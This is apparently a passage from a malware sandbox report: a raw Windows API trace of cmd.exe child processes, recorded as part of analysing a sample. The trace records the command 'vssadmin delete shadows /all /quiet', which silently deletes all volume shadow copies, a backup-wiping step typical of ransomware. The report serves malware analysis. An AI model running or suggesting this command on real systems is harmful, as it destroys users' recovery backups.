"c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vssadmin.exe")) returned 0xffffffff [0120.030] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0120.030] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0120.030] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0120.030] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0120.030] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0120.030] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0120.030] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0120.030] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0120.030] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0120.030] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0120.030] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0120.030] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0120.031] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0120.031] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0120.031] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0120.031] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0120.031] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0120.031] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0120.031] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0120.031] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0120.031] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0120.031] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0120.031] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0120.031] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0120.031] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0120.031] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0120.031] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0120.031] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0120.031] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0120.031] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0120.031] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0120.031] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0120.031] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0120.031] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0120.031] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0120.031] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0120.031] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0120.031] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0120.031] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0120.031] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0120.032] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0120.032] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0120.032] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0120.032] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0120.032] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0120.032] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0120.032] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0120.032] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0120.032] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0120.032] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0120.032] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0120.032] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0120.032] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0120.032] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0120.032] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0120.032] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0120.032] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0120.032] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0120.032] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0120.032] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0120.032] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0120.032] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0120.032] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0120.032] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0120.032] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0120.032] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0120.032] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0120.033] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0120.033] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0120.033] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0120.033] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0120.033] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0120.033] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0120.033] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0120.033] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0120.033] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0120.033] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0120.033] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0120.033] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0120.033] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0120.033] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0120.033] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0120.033] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0120.033] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0120.033] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16 [0120.033] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13 [0120.033] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4 [0120.034] GetProcessHeap () returned 0x4f0000 [0120.034] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x210) returned 0x5030e0 [0120.034] GetProcessHeap () returned 0x4f0000 [0120.034] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x5a) returned 0x5032f8 [0120.034] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19 [0120.035] GetProcessHeap () returned 0x4f0000 [0120.035] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x418) returned 0x4f07f0 [0120.035] SetErrorMode (uMode=0x0) returned 0x0 [0120.035] SetErrorMode (uMode=0x1) returned 0x0 [0120.035] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4f07f8, lpFilePart=0x30f510 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x30f510*="Desktop") returned 0x25 [0120.035] SetErrorMode (uMode=0x0) returned 0x1 [0120.035] GetProcessHeap () returned 0x4f0000 [0120.035] RtlReAllocateHeap (Heap=0x4f0000, Flags=0x0, Ptr=0x4f07f0, Size=0x6e) returned 0x4f07f0 [0120.035] GetProcessHeap () returned 0x4f0000 [0120.035] RtlSizeHeap (HeapHandle=0x4f0000, Flags=0x0, MemoryPointer=0x4f07f0) returned 0x6e [0120.035] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a810640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0120.035] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0120.035] GetProcessHeap () returned 0x4f0000 [0120.035] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x120) returned 0x503360 [0120.035] GetProcessHeap () returned 0x4f0000 [0120.035] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0x238) returned 0x4f0868 [0120.053] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0120.054] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x30f2ac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f2ac) returned 0xffffffff [0120.054] GetLastError () returned 0x2 [0120.054] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.exe.*", fInfoLevelId=0x1, lpFindFileData=0x30f28c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f28c) returned 0xffffffff [0120.054] GetLastError () returned 0x2 [0120.054] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x30f28c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f28c) returned 0xffffffff [0120.054] GetLastError () returned 0x2 [0120.054] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0120.055] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.exe", fInfoLevelId=0x1, lpFindFileData=0x30f2ac, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30f2ac) returned 0x503508 [0120.055] GetProcessHeap () returned 0x4f0000 [0120.055] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x14) returned 0x503548 [0120.055] FindClose (in: hFindFile=0x503508 | out: hFindFile=0x503508) returned 1 [0120.055] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0120.055] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0120.055] GetConsoleTitleW (in: lpConsoleTitle=0x30f784, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0120.055] InitializeProcThreadAttributeList (in: lpAttributeList=0x30f60c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30f6d4 | out: lpAttributeList=0x30f60c, lpSize=0x30f6d4) returned 1 [0120.055] UpdateProcThreadAttribute (in: lpAttributeList=0x30f60c, dwFlags=0x0, Attribute=0x60001, lpValue=0x30f6cc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30f60c, lpPreviousValue=0x0) returned 1 [0120.055] GetStartupInfoW (in: lpStartupInfo=0x30f5c8 | out: lpStartupInfo=0x30f5c8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x4ac, hStdError=0x0)) [0120.056] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0120.056] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin.exe delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x30f668*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin.exe delete shadows /all /quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30f6b4 | out: lpCommandLine="vssadmin.exe delete shadows /all /quiet", lpProcessInformation=0x30f6b4*(hProcess=0x78, hThread=0x74, dwProcessId=0x938, dwThreadId=0x918)) returned 1 [0120.068] CloseHandle (hObject=0x74) returned 1 [0120.068] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0120.068] GetProcessHeap () returned 0x4f0000 [0120.068] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5056f8 | out: hHeap=0x4f0000) returned 1 [0120.068] GetEnvironmentStringsW () returned 0x5040b8* [0120.068] GetProcessHeap () returned 0x4f0000 [0120.068] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xb36) returned 0x504bf8 [0120.068] FreeEnvironmentStringsW (penv=0x5040b8) returned 1 [0120.068] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0121.213] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x30f5a8 | out: lpExitCode=0x30f5a8*=0x2) returned 1 [0121.214] CloseHandle (hObject=0x78) returned 1 [0121.214] _vsnwprintf (in: _Buffer=0x30f6f0, _BufferCount=0x13, _Format="%08X", _ArgList=0x30f5b4 | out: _Buffer="00000002") returned 8 [0121.214] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0121.214] GetProcessHeap () returned 0x4f0000 [0121.214] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x504bf8 | out: hHeap=0x4f0000) returned 1 [0121.214] GetEnvironmentStringsW () returned 0x5040b8* [0121.214] GetProcessHeap () returned 0x4f0000 [0121.214] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xb5c) returned 0x504c20 [0121.214] FreeEnvironmentStringsW (penv=0x5040b8) returned 1 [0121.214] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0121.214] GetProcessHeap () returned 0x4f0000 [0121.214] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x504c20 | out: hHeap=0x4f0000) returned 1 [0121.214] GetEnvironmentStringsW () returned 0x5040b8* [0121.214] GetProcessHeap () returned 0x4f0000 [0121.215] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x8, Size=0xb5c) returned 0x504c20 [0121.215] FreeEnvironmentStringsW (penv=0x5040b8) returned 1 [0121.215] GetProcessHeap () returned 0x4f0000 [0121.215] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x4ff700 | out: hHeap=0x4f0000) returned 1 [0121.215] DeleteProcThreadAttributeList (in: lpAttributeList=0x30f60c | out: lpAttributeList=0x30f60c) [0121.215] _get_osfhandle (_FileHandle=1) returned 0x4ac [0121.215] SetConsoleMode (hConsoleHandle=0x4ac, dwMode=0x0) returned 0 [0121.215] _get_osfhandle (_FileHandle=1) returned 0x4ac [0121.215] GetConsoleMode (in: hConsoleHandle=0x4ac, lpMode=0x4a8041ac | out: lpMode=0x4a8041ac) returned 0 [0121.215] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0121.215] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a8041b0 | out: lpMode=0x4a8041b0) returned 1 [0121.215] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0121.216] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0121.216] SetConsoleInputExeNameW () returned 0x1 [0121.216] GetConsoleOutputCP () returned 0x1b5 [0121.217] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a804260 | out: lpCPInfo=0x4a804260) returned 1 [0121.217] SetThreadUILanguage (LangId=0x0) returned 0x409 [0121.217] exit (_Code=2) Process: id = "4" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x44993000" os_pid = "0x5e0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xbe0" cmd_line = "\"cmd\" /C vssadmin Delete Shadows /All /Quiet" cur_dir = "C:\\Windows\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 66 os_tid = 0xbd8 [0119.448] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fcb0 | out: lpSystemTimeAsFileTime=0x18fcb0*(dwLowDateTime=0x8f23b40, dwHighDateTime=0x1d68bad)) [0119.448] GetCurrentProcessId () returned 0x5e0 [0119.448] GetCurrentThreadId () returned 0xbd8 [0119.448] GetTickCount () returned 0x11532c4 [0119.448] QueryPerformanceCounter (in: lpPerformanceCount=0x18fcb8 | out: lpPerformanceCount=0x18fcb8*=23972464359) returned 1 [0119.451] GetModuleHandleW (lpModuleName=0x0) returned 0x49e70000 [0119.451] __set_app_type (_Type=0x1) [0119.451] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e97810) returned 0x0 [0119.451] __getmainargs (in: _Argc=0x49eba608, _Argv=0x49eba618, _Env=0x49eba610, _DoWildCard=0, _StartInfo=0x49e9e0f4 | out: _Argc=0x49eba608, _Argv=0x49eba618, _Env=0x49eba610) returned 0 [0119.452] GetCurrentThreadId () returned 0xbd8 [0119.452] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbd8) returned 0x3c [0119.452] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0119.452] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0119.452] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0119.453] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0119.453] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fc48 | out: phkResult=0x18fc48*=0x0) returned 0x2 [0119.453] VirtualQuery (in: lpAddress=0x18fc30, lpBuffer=0x18fbb0, dwLength=0x30 | out: lpBuffer=0x18fbb0*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0119.453] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18fbb0, dwLength=0x30 | out: lpBuffer=0x18fbb0*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0119.453] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18fbb0, dwLength=0x30 | out: lpBuffer=0x18fbb0*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0119.453] VirtualQuery (in: lpAddress=0x94000, lpBuffer=0x18fbb0, dwLength=0x30 | out: lpBuffer=0x18fbb0*(BaseAddress=0x94000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0119.453] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18fbb0, dwLength=0x30 | out: lpBuffer=0x18fbb0*(BaseAddress=0x190000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x60000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30 [0119.453] GetConsoleOutputCP () returned 0x1b5 [0119.453] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49eabfe0 | out: lpCPInfo=0x49eabfe0) returned 1 [0119.453] SetConsoleCtrlHandler (HandlerRoutine=0x49e93184, Add=1) returned 1 [0119.454] _get_osfhandle (_FileHandle=1) returned 0x7 [0119.454] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0119.454] _get_osfhandle (_FileHandle=1) returned 0x7 [0119.454] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e9e194 | out: lpMode=0x49e9e194) returned 1 [0119.454] _get_osfhandle (_FileHandle=1) returned 0x7 [0119.454] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0119.454] _get_osfhandle (_FileHandle=0) returned 0x3 [0119.454] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e9e198 | out: lpMode=0x49e9e198) returned 1 [0119.455] _get_osfhandle (_FileHandle=0) returned 0x3 [0119.455] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0119.455] GetEnvironmentStringsW () returned 0x208ab0* [0119.455] GetProcessHeap () returned 0x1f0000 [0119.455] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0xa7c) returned 0x209540 [0119.455] FreeEnvironmentStringsW (penv=0x208ab0) returned 1 [0119.455] GetProcessHeap () returned 0x1f0000 [0119.455] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x8) returned 0x208350 [0119.455] GetEnvironmentStringsW () returned 0x208ab0* [0119.455] GetProcessHeap () returned 0x1f0000 [0119.455] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0xa7c) returned 0x209fd0 [0119.455] FreeEnvironmentStringsW (penv=0x208ab0) returned 1 [0119.455] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18eb08 | out: phkResult=0x18eb08*=0x44) returned 0x0 [0119.455] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18eb00, lpData=0x18eb20, lpcbData=0x18eb04*=0x1000 | out: lpType=0x18eb00*=0x0, lpData=0x18eb20*=0x18, lpcbData=0x18eb04*=0x1000) returned 0x2 [0119.455] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18eb00, lpData=0x18eb20, lpcbData=0x18eb04*=0x1000 | out: lpType=0x18eb00*=0x4, lpData=0x18eb20*=0x1, lpcbData=0x18eb04*=0x4) returned 0x0 [0119.456] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18eb00, lpData=0x18eb20, lpcbData=0x18eb04*=0x1000 | out: lpType=0x18eb00*=0x0, lpData=0x18eb20*=0x1, lpcbData=0x18eb04*=0x1000) returned 0x2 [0119.456] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18eb00, lpData=0x18eb20, lpcbData=0x18eb04*=0x1000 | out: lpType=0x18eb00*=0x4, lpData=0x18eb20*=0x0, lpcbData=0x18eb04*=0x4) returned 0x0 [0119.456] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18eb00, lpData=0x18eb20, lpcbData=0x18eb04*=0x1000 | out: lpType=0x18eb00*=0x4, lpData=0x18eb20*=0x40, lpcbData=0x18eb04*=0x4) returned 0x0 [0119.456] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18eb00, lpData=0x18eb20, lpcbData=0x18eb04*=0x1000 | out: lpType=0x18eb00*=0x4, lpData=0x18eb20*=0x40, lpcbData=0x18eb04*=0x4) returned 0x0 [0119.456] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18eb00, lpData=0x18eb20, lpcbData=0x18eb04*=0x1000 | out: lpType=0x18eb00*=0x0, lpData=0x18eb20*=0x40, lpcbData=0x18eb04*=0x1000) returned 0x2 [0119.456] RegCloseKey (hKey=0x44) returned 0x0 [0119.456] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18eb08 | out: phkResult=0x18eb08*=0x44) returned 0x0 [0119.456] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18eb00, lpData=0x18eb20, lpcbData=0x18eb04*=0x1000 | out: lpType=0x18eb00*=0x0, lpData=0x18eb20*=0x40, lpcbData=0x18eb04*=0x1000) returned 0x2 [0119.456] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18eb00, lpData=0x18eb20, lpcbData=0x18eb04*=0x1000 | out: lpType=0x18eb00*=0x4, lpData=0x18eb20*=0x1, lpcbData=0x18eb04*=0x4) returned 0x0 [0119.456] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18eb00, lpData=0x18eb20, lpcbData=0x18eb04*=0x1000 | out: lpType=0x18eb00*=0x0, lpData=0x18eb20*=0x1, lpcbData=0x18eb04*=0x1000) returned 0x2 [0119.456] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18eb00, lpData=0x18eb20, lpcbData=0x18eb04*=0x1000 | out: lpType=0x18eb00*=0x4, lpData=0x18eb20*=0x0, lpcbData=0x18eb04*=0x4) returned 0x0 [0119.456] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18eb00, lpData=0x18eb20, lpcbData=0x18eb04*=0x1000 | out: lpType=0x18eb00*=0x4, lpData=0x18eb20*=0x9, lpcbData=0x18eb04*=0x4) returned 0x0 [0119.456] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18eb00, lpData=0x18eb20, lpcbData=0x18eb04*=0x1000 | out: lpType=0x18eb00*=0x4, lpData=0x18eb20*=0x9, lpcbData=0x18eb04*=0x4) returned 0x0 [0119.456] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18eb00, lpData=0x18eb20, lpcbData=0x18eb04*=0x1000 | out: lpType=0x18eb00*=0x0, lpData=0x18eb20*=0x9, lpcbData=0x18eb04*=0x1000) returned 0x2 [0119.456] RegCloseKey (hKey=0x44) returned 0x0 [0119.456] time (in: timer=0x0 | out: timer=0x0) returned 0x5f613bda [0119.456] srand (_Seed=0x5f613bda) [0119.456] GetCommandLineW () returned="\"cmd\" /C vssadmin Delete Shadows /All /Quiet" [0119.456] GetCommandLineW () returned="\"cmd\" /C vssadmin Delete Shadows /All /Quiet" [0119.456] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49eac0a0 | out: lpBuffer="C:\\Windows") returned 0xa [0119.457] GetProcessHeap () returned 0x1f0000 [0119.457] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x218) returned 0x20aa60 [0119.457] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x20aa70, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0119.457] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e9f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0119.457] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e9f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0119.457] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e9f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0119.457] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0119.457] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0119.457] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0119.457] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0119.457] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0119.457] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0119.457] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0119.457] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0119.457] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0119.457] GetProcessHeap () returned 0x1f0000 [0119.457] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, 